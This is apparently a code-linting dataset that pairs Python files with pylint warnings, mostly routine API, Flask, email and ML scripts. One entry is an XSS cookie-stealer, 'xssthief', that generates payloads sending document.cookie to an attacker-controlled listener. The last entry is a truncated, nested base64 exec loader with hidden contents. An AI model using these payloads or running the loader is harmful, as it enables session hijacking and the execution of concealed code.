| code (string, lengths 20 to 13.2k) | label (string, lengths 21 to 6.26k) |
|---|---|
1 import requests
2 import json
3 import functools
4 import logging
5 # from collections import defaultdict
6 # from xml.etree import ElementTree
7
8
9 # ref: https://stackoverflow.com/questions/7684333/converting-xml-to-dictionary-using-elementtree
10 # def etree_to_dict(t):
11 # d = {t.tag: {} if t.attrib else None}
12 # children = list(t)
13 # if children:
14 # dd = defaultdict(list)
15 # for dc in map(etree_to_dict, children):
16 # for k, v in dc.items():
17 # dd[k].append(v)
18 # d = {t.tag: {k: v[0] if len(v) == 1 else v
19 # for k, v in dd.items()}}
20 # if t.attrib:
21 # d[t.tag].update(('@' + k, v)
22 # for k, v in t.attrib.items())
23 # if t.text:
24 # text = t.text.strip()
25 # if children or t.attrib:
26 # if text:
27 # d[t.tag]['#text'] = text
28 # else:
29 # d[t.tag] = text
30 # return d
31
32
33 logger = logging.getLogger(__name__)
34
35
36 entrypoint = '/api'
37
38
39 class PRTGError(Exception):
40 pass
41
42
43 class PRTGAuthenticationError(PRTGError):
44 pass
45
46
47 class ResponseTypes:
48 @staticmethod
49 def json(data):
50 return json.loads(data)
51
52 # @staticmethod
53 # def xml(data):
54 # return etree_to_dict(ElementTree.XML(data))
55
56
57 class API:
58 def __init__(self, host, username, passhash):
59 self._requests = requests
60 self._host = host
61 self._authparams = {
62 "username": username,
63 "passhash": passhash
64 }
65
66 @property
67 def requests(self):
68 return self._requests
69
70 @requests.setter
71 def requests(self, val):
72 self._requests = val
73
74 def _call(self, method, response_type=None, **params):
75 if response_type is None:
76 response_type = 'json'
77 if not hasattr(ResponseTypes, response_type):
78 raise ValueError("Unknown response type", response_type)
79 url = '%s%s/%s.%s' % (self._host, entrypoint, method, response_type)
80 try:
81 params = dict(params, **self._authparams)
82 response = self._requests.get(url, params=params)
83 if response.status_code != 200:
84 logger.warning("Wrong exit code %d for %s", response.status_code, url)
85 raise PRTGError("Invalid HTTP code response", response.status_code)
86 return getattr(ResponseTypes, response_type)(response.content.decode('utf-8'))
87 except Exception as e:
88 raise PRTGError(e) from e
89
90 def __getattr__(self, item):
91 return functools.partial(self._call, item)
92
93 @staticmethod
94 def from_credentials(host, username, password, _requests=None):
95 url = '%s%s/getpasshash.htm' % (host, entrypoint)
96 params = {
97 "username": username,
98 "password": password,
99 }
100 if _requests is None:
101 _requests = requests.Session()
102
103 response = _requests.get(url, params=params)
104 if response.status_code != 200:
105 raise PRTGAuthenticationError("Couldn't authenticate", response.status_code, response.content)
106 result = API(host, username, response.content)
107 result.requests = _requests
108 return result
109
| 47 - refactor: too-few-public-methods
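The `API` class above resolves any unknown attribute into an HTTP call via `__getattr__` and `functools.partial`, so attribute names map onto `/api/<name>.json` endpoints. A minimal usage sketch; the host, credentials, and the `table` method with its parameters are illustrative assumptions about a PRTG endpoint, not taken from the entry:

api = API.from_credentials('https://prtg.example.com', 'admin', 'secret')
# Attribute access builds the URL, so this requests .../api/table.json?content=sensors&...
sensors = api.table(content='sensors', columns='objid,sensor,status')
print(sensors)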
|
1 from locust import HttpLocust, TaskSet, task
2
3 class WebsiteTasks(TaskSet):
4 @task
5 def index(self):
6 self.client.get("/")
7
8 @task
9 def status(self):
10 self.client.get("/status")
11
12 @task
13 def hetarchief(self):
14 self.client.get("/status/hetarchief.png")
15
16 @task
17 def ftp(self):
18 self.client.get("/status/ftp.png")
19
20 class WebsiteUser(HttpLocust):
21 task_set = WebsiteTasks
22 min_wait = 5000
23 max_wait = 15000
| 20 - refactor: too-few-public-methods
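`HttpLocust`, `min_wait`, and `max_wait` belong to the pre-1.0 Locust API. A hedged sketch of the same scenario against the 1.x+ interface, assuming the installed version provides `HttpUser` and `between`:

from locust import HttpUser, task, between

class WebsiteUser(HttpUser):
    wait_time = between(5, 15)  # seconds, replacing min_wait/max_wait in milliseconds

    @task
    def index(self):
        self.client.get("/")

    @task
    def status(self):
        self.client.get("/status")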
|
1 import os
2 from flask import jsonify, Response
3 import flask
4
5
6 class FileResponse(Response):
7 default_mimetype = 'application/octet-stream'
8
9 def __init__(self, filename, **kwargs):
10 if not os.path.isabs(filename):
11
12 filename = os.path.join(flask.current_app.root_path, filename)
13
14 with open(filename, 'rb') as f:
15 contents = f.read()
16
17 response = contents
18 super().__init__(response, **kwargs)
19
20
21 class StatusResponse(FileResponse):
22 default_mimetype = 'image/png'
23
24 def __init__(self, status, **kwargs):
25 if status is True:
26 status = 'ok'
27 elif status is False:
28 status = 'nok'
29 else:
30 status = 'unk'
31
32 filename = 'static/status-%s.png' % (status,)
33 super().__init__(filename, **kwargs)
34
35
36 class Responses:
37 @staticmethod
38 def json(obj):
39 return jsonify(obj)
40
41 @staticmethod
42 def html(obj):
43 return Response('<html><body>%s</body></html>' % (obj,), content_type='text/html')
44
45 @staticmethod
46 def txt(obj):
47 if type(obj) is not str:
48 obj = '\n'.join(obj)
49 return Response(obj, content_type='text/plain')
50
51 @staticmethod
52 def status(status_):
53 return StatusResponse(status_)
| 6 - refactor: too-few-public-methods
21 - refactor: too-few-public-methods
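A minimal sketch of how these response classes could be wired into a Flask app, assuming the `Responses` class above is in scope; the route and the `check_ftp` probe are illustrative assumptions, not part of the entry:

from flask import Flask

app = Flask(__name__)

def check_ftp():
    # Hypothetical health probe; a real one would contact the FTP service and return True/False/None.
    return True

@app.route('/status/ftp.png')
def ftp_status():
    # True -> static/status-ok.png, False -> status-nok.png, anything else -> status-unk.png
    return Responses.status(check_ftp())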
|
1 #!/usr/bin/env python
2 # -*- coding: utf-8 -*-
3 #
4
5 # if you want to test this script, set this True:
6 # then it won't send any mails; it will just print out the produced html and text
7 #test = False
8 test = False
9
10 #which kind of db is Trac using?
11 mysql = False
12 pgsql = False
13 sqlite = True
14
15 # for mysql/pgsql:
16 dbhost="localhost"
17 dbuser="database_user"
18 dbpwd="database_password"
19 dbtrac="database_of_trac"
20 #or for sqlite:
21 sqlitedb='/path/to/trac/db/trac.db'
22 #or if your db is in memory:
23 #sqlitedb=':memory:'
24
25 # the url to the trac (notice the slash at the end):
26 trac_url='https://trac.example.org/path/to/trac/'
27 # the default domain, where the users reside
28 # ie: if no email address is stored for them, username@domain.tld will be used
29 to_domain="@example.org"
30
31 import codecs, sys
32 sys.setdefaultencoding('utf-8')
33 import site
34
35 # importing the appropriate database connector
36 # (you should install one, if you want to use ;)
37 # or you can use a uniform layer, like sqlalchemy)
38 if mysql:
39 import MySQLdb
40 if pgsql:
41 import psycopg2
42 if sqlite:
43 from pysqlite2 import dbapi2 as sqlite
44
45 import time
46 import smtplib
47 from email.mime.multipart import MIMEMultipart
48 from email.mime.text import MIMEText
49 db = None
50 cursor = None
51
52 try:
53 if mysql:
54 db = MySQLdb.connect(host=dbhost, user=dbuser, passwd=dbpwd, db=dbtrac)
55 if pgsql:
56 db = psycopg2.connect("host='"+ dbhost +"' user='" + dbuser + "' password='" + dbpwd + "' dbname='" + dbtrac + "'")
57 if sqlite:
58 db = sqlite.connect(sqlitedb)
59 except:
60 print "cannot connect to db"
61 raise
62 sys.exit(1)
63
64 cursor = db.cursor()
65
66 fields = ['summary', 'component', 'priority', 'status', 'owner', 'reporter']
67
68 #I think MySQL needs '"' instead of "'" without any ';',
69 # with more strict capitalization (doubling quotes mean a single quote ;) )
70 # so you'll have to put these queries into this format:
71 # sql="""query""" or sql='"query"' like
72 # sql = '"SELECT owner FROM ticket WHERE status !=""closed""""'
73 # for postgresql simply use:
74 sql = "select id, %s from ticket where status == 'testing' or status == 'pre_testing';" % ', '.join(fields)
75 cursor.execute(sql)
76 tickets = cursor.fetchall()
77 tickets_dict = {}
78
79 # Reading last exec time
80 last_exec_path = '/var/local/trac_testing_tickets_notify_last_exec_timestamp'
81 last_exec = 0
82 try:
83 f = open(last_exec_path, "r")
84 last_exec = int(f.read())
85 f.close()
86 except:
87 last_exec = 0
88
89 cur_time = int(time.time())
90 notify_tickets = set()
91 time_quant = 86400 # seconds per day - frequency of reminders
92 ticket_url = 'https://trac.example.org/path/to/trac/ticket/'
93
94 recipient_list = ['recipient1@example.org', 'recipient2@example.arg', ]
95
96 for ticket in tickets:
97 tickets_dict[ticket[0]] = {'id': ticket[0]}
98 offset = 1
99 for field in fields:
100 tickets_dict[ticket[0]][field] = ticket[offset]
101 offset += 1
102
103 sql = "select time from ticket_change where ticket == %d and field == 'status' and (newvalue == 'testing' or newvalue == 'pre_testing') order by time desc limit 1;" % ticket[0]
104 cursor.execute(sql)
105 last_time = cursor.fetchall()
106 if len(last_time) > 0:
107 last_time = last_time[0][0]
108 if (int((cur_time - last_time) / time_quant) != int((last_exec - last_time) / time_quant)) and int((cur_time - last_time) / time_quant) > 0:
109 notify_tickets |= set([ticket[0], ])
110
111 # No new tickets - aborting
112 if len(notify_tickets) == 0:
113 print 'No new tickets: aborting.'
114 exit()
115
116 #calculating column widths
117 column_widths = {}
118 for id in notify_tickets:
119 for field, value in tickets_dict[id].iteritems():
120 column_widths[field] = field in column_widths and max(column_widths[field], len("%s" % value)) or max(len("%s" % value), len("%s" % field))
121
122 #generating mail text
123 msg_header = """
124 List of tickets pending your attention:
125 """
126 msg_tail = """
127 Trac testing tickets notification script.
128 """
129 header_line_template = '|| %%(id)%ds ||' % (len(ticket_url) + column_widths['id'])
130 normal_line_template = '|| %s%%(id)%ds ||' % (ticket_url, column_widths['id'])
131 line_template = ''
132 for field in fields:
133 line_template += ' %%(%s)%ds ||' % (field, column_widths[field])
134
135 header = { 'id' : 'URL' }
136 for field in fields:
137 header[field] = field
138 table_header = (header_line_template + line_template) % header
139
140 table = []
141 for id in notify_tickets:
142 table.append((normal_line_template + line_template) % tickets_dict[id])
143
144 msg = '\n'.join ([msg_header, table_header] + table + [msg_tail])
145
146 htmlmsg_header = '''
147 <html>
148 <head>
149 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
150 </head>
151 <body>
152 <table>
153 '''
154 htmlmsg_tail = '''
155 </table>
156 </body>
157 </html>
158 '''
159
160 normal_line_template = '<td><a href="%s%%(id)s">%%(id)s</a></td>' % ticket_url
161 line_template = ''
162 for field in fields:
163 line_template += '<td>%%(%s)s</td>' % field
164
165 htmltable_header = '<tr><th>' + '</th><th>'.join(['Ticket'] + fields) + '</th></tr>'
166 htmltable = []
167 for id in notify_tickets:
168 htmltable.append(('<tr>' + normal_line_template + line_template + '</tr>') % tickets_dict[id])
169
170 htmlmsg = '\n'.join ([htmlmsg_header, htmltable_header] + htmltable + [htmlmsg_tail])
171
172 import email.Charset
173 email.Charset.add_charset('utf-8', email.Charset.SHORTEST, None, None)
174
175 if test:
176 print msg
177 print
178 print htmlmsg
179 else:
180 mailmsg = MIMEMultipart('alternative')
181 mailmsg['Subject'] = "Report testing Tickets at %s" % time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))
182 mailmsg['From'] = 'trac@example.org'
183 mailmsg['To'] = ', '.join(recipient_list)
184
185 part1 = MIMEText(msg, 'plain')
186 part2 = MIMEText(htmlmsg.encode('utf-8', 'replace'), 'html', 'utf-8')
187
188 mailmsg.attach(part1)
189 mailmsg.attach(part2)
190
191 s = smtplib.SMTP()
192 s.connect()
193 s.sendmail(mailmsg['From'], recipient_list, mailmsg.as_string())
194 s.close()
195
196 f = open(last_exec_path, "w")
197 f.write("%s" % cur_time)
198 f.close()
| 60 - error: syntax-error
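The syntax error pylint reports at line 60 is a symptom of Python 2 constructs throughout the script (`print` statements, `sys.setdefaultencoding`, `dict.iteritems`). A minimal sketch of the Python 3 equivalents for the spots pylint trips over, not a full port:

# line 60: print is a function in Python 3
print("cannot connect to db")

# line 119: dict.iteritems() was removed; use items()
tickets_dict = {1: {'summary': 'demo'}}
for field, value in tickets_dict[1].items():
    print(field, value)

# sys.setdefaultencoding() no longer exists; pass encoding='utf-8' to open() instead.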
|
1 import os
2 import random
3 import smtplib # Email
4 from dotenv import load_dotenv # For getting stored password
5 #import getpass # For dynamically enter password
6
7 load_dotenv()
8
9 username = input("E-mail: ") # e.g. "your_gmail_to_send_from@gmail.com"
10 password = os.getenv("PASSWORD") # alternatively: getpass.getpass()
11
12 def santa_message_body(santa_assigment):
13 return f"Your secret santa assignment is {santa_assigment}."
14
15 def send_email(to_person, to_email, subject, message_body):
16
17 server = smtplib.SMTP('smtp.gmail.com', 587)
18 server.ehlo()
19 server.starttls()
20 server.login(username, password)
21
22 sender_name = "Rami Manna"
23 message = f"""From: {sender_name} <{username}>
24 To: {to_person} <{to_email}>
25 MIME-Version: 1.0
26 Content-type: text/html
27 Subject: {subject}
28
29 {message_body}
30
31 """
32
33 server.sendmail(username, to_email, message)
34 server.quit()
35
36
37 def send_secret_santas(participants):
38 not_gifted = {name for name, email in participants}
39 for name, email in participants:
40 santa_assigment = random.choice(list(not_gifted - {name}))
41 not_gifted.remove(santa_assigment)
42
43 message_body = santa_message_body(santa_assigment)
44 subject = "Your Secret Santa Assignment!"
45 send_email(name, email, subject, message_body)
46
47 PARTICIPANTS = [('Harry Potter', 'potter@hogwarts.edu'), ('Hermione Granger', "hermione@hogwarts.edu")]
48
49 if __name__ == "__main__":
50
51 send_secret_santas(PARTICIPANTS)
52
| Clean Code: No Issues Detected
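One caveat pylint cannot see: in `send_secret_santas`, with three or more participants the last remaining un-gifted name can be the final giver themselves, in which case `random.choice` is called on an empty list and raises `IndexError`. A hedged sketch of drawing the whole assignment up front instead; the function name and retry strategy are illustrative, not taken from the entry:

import random

def draw_secret_santas(names):
    # Reshuffle until nobody is assigned to themselves: a simple rejection-sampled derangement.
    while True:
        receivers = names[:]
        random.shuffle(receivers)
        if all(giver != receiver for giver, receiver in zip(names, receivers)):
            return dict(zip(names, receivers))

print(draw_secret_santas(['Harry', 'Hermione', 'Ron']))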
|
1 import requests
2 import json
3 import pandas as pd
4 url = "https://maps.googleapis.com/maps/api/place/textsearch/json"
5 key = "change_this"
6 cities = [
7 'jakarta',
8 'surabaya',
9 'malang',
10 'semarang'
11 ]
12 cols = ['street_address', 'lat', 'long']
13 df = pd.DataFrame(columns=cols)
14
15 for city in cities:
16 querystring = {"query":f"indomaret in {city}","key":key}
17 res = requests.request("GET", url, params=querystring)
18 json_res = json.loads(res.text)
19 for result in json_res['results']:
20 address = result['formatted_address']
21 lat = result['geometry']['location']['lat']
22 lng = result['geometry']['location']['lng']
23 df = df.append(pd.Series([address, lat, lng], index=cols), ignore_index=True)
24 df.to_csv('for_pepe.csv', index=False)
| 17 - warning: missing-timeout
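The `missing-timeout` warning points at the `requests.request` call on line 17; without a timeout a stalled connection can hang the loop indefinitely. A sketch of the guarded call, where the 10-second value is an arbitrary choice:

import requests

url = "https://maps.googleapis.com/maps/api/place/textsearch/json"
querystring = {"query": "indomaret in jakarta", "key": "change_this"}
# timeout bounds how long connecting and reading may block; tune it to the API's latency.
res = requests.get(url, params=querystring, timeout=10)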
|
1 from learn import ModelTrainer
2 from collection import Collection
3 import pandas as pd
4
5 import logging
6 import traceback
7 import os
8
9 logging.basicConfig()
10 logger = logging.getLogger(__name__)
11 logger.setLevel(logging.INFO)
12
13 # === THESIS ===
14
15 anbieter_config = {
16 'Construction': [
17 'Alpiq AG',
18 'KIBAG',
19 'Egli AG',
20 ],
21 'IT': [
22 'Swisscom',
23 'ELCA Informatik AG',
24 'Unisys',
25 ],
26 'Other': [
27 'Kummler + Matter AG',
28 'Thermo Fisher Scientific (Schweiz) AG',
29 'AXA Versicherung AG',
30 ],
31 'Diverse': [
32 'Siemens AG',
33 'ABB',
34 'Basler & Hofmann West AG',
35 ]
36 }
37
38
39
40 # === TESTING ===
41
42 #anbieter = 'Marti AG' #456
43 #anbieter = 'Axpo AG' #40
44 #anbieter = 'Hewlett-Packard' #90
45 #anbieter = 'BG Ingénieurs Conseils' SA #116
46 #anbieter = 'Pricewaterhousecoopers' #42
47 #anbieter = 'Helbling Beratung + Bauplanung AG' #20
48 #anbieter = 'Ofrex SA' #52
49 #anbieter = 'PENTAG Informatik AG' #10
50 #anbieter = 'Wicki Forst AG' #12
51 #anbieter = 'T-Systems Schweiz' #18
52 #anbieter = 'Bafilco AG' #20
53 #anbieter = '4Video-Production GmbH' #3
54 #anbieter = 'Widmer Ingenieure AG' #6
55 #anbieter = 'hmb partners AG' #2
56 #anbieter = 'Planmeca' #4
57 #anbieter = 'K & M Installationen AG' #4
58
59
60 select = (
61 "ausschreibung.meldungsnummer, "
62 "anbieter.institution as anbieter_institution, "
63 "auftraggeber.beschaffungsstelle_plz, "
64 "ausschreibung.gatt_wto, "
65 "ausschreibung.sprache, "
66 "ausschreibung.auftragsart, "
67 "ausschreibung.auftragsart_art, "
68 "ausschreibung.lose, "
69 "ausschreibung.teilangebote, "
70 "ausschreibung.varianten, "
71 "ausschreibung.bietergemeinschaft, "
72 "cpv_dokument.cpv_nummer as ausschreibung_cpv"
73 )
74
75 attributes = ['ausschreibung_cpv', 'auftragsart_art', 'beschaffungsstelle_plz', 'auftragsart', 'gatt_wto','lose','teilangebote', 'varianten','sprache']
76 #attributes = ['auftragsart_art', 'beschaffungsstelle_plz', 'auftragsart', 'ausschreibung_cpv', 'gatt_wto','teilangebote', 'sprache']
77 #attributes = ['ausschreibung_cpv', 'auftragsart_art', 'beschaffungsstelle_plz', 'auftragsart', 'gatt_wto','lose','teilangebote', 'varianten','sprache']
78 # attributes = [
79 # [ 'ausschreibung_cpv', 'auftragsart_art' ],
80 # [ 'ausschreibung_cpv', 'beschaffungsstelle_plz' ],
81 # [ 'ausschreibung_cpv', 'auftragsart' ],
82 # [ 'ausschreibung_cpv', 'gatt_wto' ],
83 # [ 'ausschreibung_cpv', 'lose' ],
84 # [ 'ausschreibung_cpv', 'teilangebote' ],
85 # [ 'ausschreibung_cpv', 'varianten' ],
86 # [ 'ausschreibung_cpv', 'sprache' ]
87 # ]
88
89 config = {
90 # ratio that the positive and negative responses have to each other
91 'positive_to_negative_ratio': 0.5,
92 # Percentage of training set that is used for testing (Recommendation of at least 25%)
93 'test_size': 0.25,
94 'runs': 100,
95 #'enabled_algorithms': ['random_forest'],
96 'enabled_algorithms': ['random_forest', 'decision_tree', 'gradient_boost'],
97 'random_forest': {
98 # Tune Random Forest Parameter
99 'n_estimators': 100,
100 'max_features': 'sqrt',
101 'max_depth': None,
102 'min_samples_split': 4
103 },
104 'decision_tree': {
105 'max_depth': 30,
106 'max_features': 'sqrt',
107 'min_samples_split': 4
108 },
109 'gradient_boost': {
110 'n_estimators': 100,
111 'learning_rate': 0.1,
112 'max_depth': 30,
113 'min_samples_split': 4,
114 'max_features': 'sqrt'
115 }
116 }
117
118
119 class IterationRunner():
120
121 def __init__(self, anbieter_config, select, attributes, config):
122 self.anbieter_config = anbieter_config
123 self.select = select
124 self.attributes = attributes
125 self.config = config
126 self.trainer = ModelTrainer(select, '', config, attributes)
127 self.collection = Collection()
128
129 def run(self):
130 for label, anbieters in self.anbieter_config.items():
131 logger.info(label)
132 for anbieter in anbieters:
133 for attr_id in range(len(self.attributes)):
134 att_list = self.attributes[:attr_id+1]
135 self.singleRun(anbieter, att_list, label)
136 self.trainer.resetSQLData()
137
138 def runAttributesEachOne(self):
139 for label, anbieters in self.anbieter_config.items():
140 logger.info(label)
141 for anbieter in anbieters:
142 for attr in self.attributes:
143 att_list = [attr]
144 self.singleRun(anbieter, att_list, label)
145 self.trainer.resetSQLData()
146
147 def runAttributesList(self):
148 for label, anbieters in self.anbieter_config.items():
149 logger.info(label)
150 for anbieter in anbieters:
151 for att_list in self.attributes:
152 self.singleRun(anbieter, att_list, label)
153 self.trainer.resetSQLData()
154
155 def runSimpleAttributeList(self):
156 for label, anbieters in self.anbieter_config.items():
157 logger.info(label)
158 for anbieter in anbieters:
159 self.singleRun(anbieter, self.attributes, label)
160 self.trainer.resetSQLData()
161
162 def singleRun(self, anbieter, att_list, label):
163 logger.info('label: {}, anbieter: {}, attributes: {}'.format(label, anbieter, att_list))
164 try:
165 self.trainer.attributes = att_list
166 self.trainer.anbieter = anbieter
167 output = self.trainer.run()
168 output['label'] = label
169 self.collection.append(output)
170 filename = os.getenv('DB_FILE', 'dbs/auto.json')
171 self.collection.to_file(filename)
172 except Exception as e:
173 traceback.print_exc()
174 print(e)
175 print('one it done')
176
177 runner = IterationRunner(anbieter_config, select, attributes, config)
178
179 if __name__ == '__main__':
180 # runner.collection.import_file('dbs/auto.json')
181 runner.run()
182 runner.runAttributesEachOne()
183 runner.runAttributesList()
184 # label, anbieters = next(iter(runner.anbieter_config.items()))
185 # print(label)
| 121 - warning: redefined-outer-name
121 - warning: redefined-outer-name
121 - warning: redefined-outer-name
121 - warning: redefined-outer-name
163 - warning: logging-format-interpolation
172 - warning: broad-exception-caught
3 - warning: unused-import
|
1 import configparser
2 import sqlalchemy
3
4 # git update-index --skip-worktree config.ini
5
6
7 config = configparser.ConfigParser()
8
9
10 config.read("config.ini")
11
12 connection_string = 'mysql+' + config['database']['connector'] + '://' + config['database']['user'] + ':' + config['database']['password'] + '@' + config['database']['host'] + '/' + config['database']['database']
13
14 if __name__ == "__main__":
15 for item, element in config['database'].items():
16 print('%s: %s' % (item, element))
17 print(connection_string)
18 else:
19 engine = sqlalchemy.create_engine(connection_string)
20 connection = engine.connect()
| Clean Code: No Issues Detected
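A sketch of generating the `config.ini` layout this module expects, inferred from the keys it reads under `[database]`; every value below is a placeholder:

import configparser

cfg = configparser.ConfigParser()
cfg['database'] = {
    'connector': 'pymysql',   # SQLAlchemy driver name appended after 'mysql+'
    'user': 'dbuser',
    'password': 'secret',
    'host': 'localhost',
    'database': 'mydb',
}
with open('config.ini', 'w', encoding='utf-8') as f:
    cfg.write(f)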
|
1 import json
2 import pandas as pd
3 import warnings
4
5 class Collection():
6
7 algorithms = ['gradient_boost', 'decision_tree', 'random_forest']
8
9 def __init__(self):
10 self.list = []
11
12
13 def append(self, item):
14 self.list.append(item)
15
16 def __iter__(self):
17 return iter(self.list)
18
19 def get_all_as_df(self, algorithm):
20 try:
21 tmp = []
22 for iteration in self.list:
23 tmp.append(iteration[algorithm]['metadata'])
24 return pd.DataFrame(tmp, index=[iteration['anbieter'] for iteration in self.list])
25 except:
26 warnings.warn('Select an algorithm: "random_forest", "gradient_boost" or "decision_tree"')
27
28 def df_row_per_algorithm(self):
29 tmp = []
30 for iteration in self.list:
31 for algorithm in self.algorithms:
32 output = iteration[algorithm]['metadata']
33 evaluation_dataframe = pd.DataFrame.from_dict(iteration[algorithm]['data'])
34 # missing metrics
35 output['acc_std'] = evaluation_dataframe['accuracy'].std()
36 evaluation_dataframe['MCC'] = evaluation_dataframe['MCC']*100
37 output['mcc_std'] = evaluation_dataframe['MCC'].std()
38 output['fn_std'] = evaluation_dataframe['fn_rate'].std()
39
40 output['anbieter'] = iteration['anbieter']
41 output['label'] = iteration['label']
42 output['algorithm'] = algorithm
43 output['attributes'] = ",".join(iteration['attributes'])
44 tmp.append(output)
45 return pd.DataFrame(tmp)
46
47 def to_json(self, **kwargs):
48 return json.dumps(self.list, **kwargs)
49
50 def to_file(self, filename):
51 with open(filename, 'w') as fp:
52 json.dump(self.list, fp, indent=4, sort_keys=True)
53
54 def import_file(self, filename, force=False):
55 if len(self.list) and not force:
56 warnings.warn("Loaded Collection, pls add force=True")
57 else:
58 with open(filename, 'r') as fp:
59 self.list = json.load(fp)
| 25 - warning: bare-except
19 - refactor: inconsistent-return-statements
51 - warning: unspecified-encoding
58 - warning: unspecified-encoding
|
1 #!/usr/bin/python3
2
3 import argparse
4 import os
5 from http.server import HTTPServer, BaseHTTPRequestHandler
6 from urllib.parse import parse_qs
7 from requests import *
8 ip = get('https://api.ipify.org').text
9
10 parser = argparse.ArgumentParser(description='creates xss payloads and starts http server to capture responses and collect cookies', epilog='xssthief --error 10.10.10.50' + '\n' + 'xssthief --image 10.10.10.50' + '\n' + 'xssthief --obfuscated 10.10.10.50', formatter_class=argparse.RawTextHelpFormatter)
11 parser.add_argument('lhost', help='ip address of listening host')
12 parser.add_argument('-e', '--error', action='store_true', help='create error payload')
13 parser.add_argument('-i', '--image', action='store_true', help='create image payload')
14 parser.add_argument('-o', '--obfuscated', action='store_true', help='create obfuscated payload')
15 args = parser.parse_args()
16
17 lhost = ip
18
19 class handler(BaseHTTPRequestHandler):
20 def do_GET(self):
21 qs = {}
22 path = self.path
23 if '?' in path:
24 path, temp = path.split('?', 1)
25 qs = parse_qs(temp)
26 print(qs)
27
28 def serve():
29 print('Starting server, press Ctrl+C to exit...\n')
30 address = (lhost, 80)
31 httpd = HTTPServer(address, handler)
32 try:
33 httpd.serve_forever()
34 except KeyboardInterrupt:
35 httpd.server_close()
36 print('\nBye!')
37
38 def obfuscate():
39 js = '''document.write('<img src=x onerror=this.src="http://''' + lhost + '''/?cookie="+encodeURI(document.getElementsByName("cookie")[0].value)>');'''
40 ords = ','.join([str(ord(c)) for c in js])
41 payload = '<img src="/><script>eval(String.fromCharCode(' + ords + '))</script>" />'
42 return payload
43
44 def err_payload():
45 xss = '''<img src=x onerror=this.src='http://''' + lhost + '''/?cookie='+document.cookie>'''
46 print('[*] Your payload: ' + xss + '\n')
47 serve()
48
49 def img_payload():
50 xss = '''<new Image().src='http://''' + lhost + '''/?cookie='+document.cookie>'''
51 print('[*] Your payload: ' + xss + '\n')
52 serve()
53
54 def obs_payload():
55 xss = obfuscate()
56 print('[*] Your payload: ' + xss + '\n')
57 serve()
58
59 def main():
60 if args.obfuscated:
61 obs_payload()
62 elif args.error:
63 err_payload()
64 elif args.image:
65 img_payload()
66 else:
67 parser.print_help()
68
69 main()
| 20 - warning: bad-indentation
21 - warning: bad-indentation
22 - warning: bad-indentation
23 - warning: bad-indentation
24 - warning: bad-indentation
25 - warning: bad-indentation
26 - warning: bad-indentation
29 - warning: bad-indentation
30 - warning: bad-indentation
31 - warning: bad-indentation
32 - warning: bad-indentation
33 - warning: bad-indentation
34 - warning: bad-indentation
35 - warning: bad-indentation
36 - warning: bad-indentation
39 - warning: bad-indentation
40 - warning: bad-indentation
41 - warning: bad-indentation
42 - warning: bad-indentation
45 - warning: bad-indentation
46 - warning: bad-indentation
47 - warning: bad-indentation
50 - warning: bad-indentation
51 - warning: bad-indentation
52 - warning: bad-indentation
55 - warning: bad-indentation
56 - warning: bad-indentation
57 - warning: bad-indentation
60 - warning: bad-indentation
61 - warning: bad-indentation
62 - warning: bad-indentation
63 - warning: bad-indentation
64 - warning: bad-indentation
65 - warning: bad-indentation
66 - warning: bad-indentation
67 - warning: bad-indentation
7 - warning: redefined-builtin
7 - warning: wildcard-import
8 - warning: missing-timeout
4 - warning: unused-import
7 - warning: unused-wildcard-import
|
1 #-------------------------------------------------#
2 # Obfuscate By Mr.Gaming, Thanks To Black Coder Crush
3 # github : https://github.com/clayhacker-max
4 # from Linux
5 # localhost : aarch64
6 # key : Asep-fA6bC2eA6tB8lX8
7 # date : Fri Jul 16 13:54:16 2021
8 #-------------------------------------------------#
9 #Compile By DNMODZ
10 #My Team : Black Coder Crush
11 import base64
12 exec(base64.b64decode("#Compile By DNMODZ
#My Team : Black Coder Crush
import base64
exec(base64.b64decode("I0NvbXBpbGUgQnkgRE5NT0RaCiNNeSBUZWFtIDogQmxhY2sgQ29kZXIgQ3J1c2gKaW1wb3J0IGJhc2U2NApleGVjKGJhc2U2NC5iNjRkZWNvZGUoIkkwTnZiWEJwYkdVZ1Fua2dSRTVOVDBSYUNpTk5lU0JVWldGdElEb2dRbXhoWTJzZ1EyOWtaWElnUTNKMWMyZ0thVzF3YjNKMElHSmhjMlUyTkFwbGVHVmpLR0poYzJVMk5DNWlOalJrWldOdlpHVW9Ja2t3VG5aaVdFSndZa2RWWjFGdWEyZFNSVFZPVkRCU1lVTnBUazVsVTBKVldsZEdkRWxFYjJkUmJYaG9XVEp6WjFFeU9XdGFXRWxuVVROS01XTXlaMHRoVnpGM1lqTktNRWxIU21oak1sVXlUa0Z3YkdWSFZtcExSMHBvWXpKVk1rNUROV2xPYWxKcldsZE9kbHBIVlc5SmEydDNWRzVhYVZkRlNuZFphMlJXV2pGR2RXRXlaRk5TVkZaUFZrUkNVMWxWVG5CVWF6VnNWVEJLVmxkc1pFZGtSV3hGWWpKa1VtSllhRzlYVkVwNldqRkZlVTlYZEdGWFJXeHVWVlJPUzAxWFRYbGFNSFJvVm5wR00xbHFUa3ROUld4SVUyMW9hazFzVlhsVWEwWjNZa2RXU0ZadGNFeFNNSEJ2V1hwS1ZrMXJOVVJPVjJ4UFlXeEtjbGRzWkU5a2JIQklWbGM1U21FeWRETldSelZoWVZaa1JsTnVaRnBoTWxKWFYycEdSMlJYUlhsYVJrNVRWa1phVUZaclVrTlZNV3hXVkc1Q1ZXRjZWbk5XVkVKTFZteGtjMXBGWkd0U1YzaEdXV3BLYTFWdFNsbGhSemxZVmtWd05sZHFSa1psVlRsWVpFZEdXRkpYZUhWV1ZsSlBVekF4V0ZSWWJHRk5TRkp2Vm01d1IwMHhiSEZVYTNST1VsZDRTVlV5TVc5aGF6RnpWbGhzVldFd1dqTlphMlJYVTBaYWRHTkZlRk5OU0VKMlYxaHdTMVpyTVhKT1ZWSlBWako0VUZsWGVFdGpiR1J6V2tVNWEySklRa2xXYkdNMVUyMUtWbGRzYkZWV2JXaHlXVlpWZDJReVNYcGFSbEpYVmpKb1VWWkhlR3RVTURCM1RWVmFhMUl5YUZoYVYzUmFaV3hrV0dORk9WUk5SRVpIV1d0V2IxVkdaRWxSYTFwWFZtMW9SRnBFUm5Oak1rWkdWRzEwYVZaVVZYaFdiRnByWVRKRmVGTlliR3hTUlVwWldXdFdWMDB4VmpaVGEyUllVbFJHV2xkclpITlVhekZJVDFST1ZrMVdXblpXUkVwVFl6SkZlbUpIZEZOTk1taDVWbFphVTFFeFVrZGlSbVJhVFRKb2NsUlhkSE5PYkZWNVkwVk9WR0pGTlVkWk1HTTFWM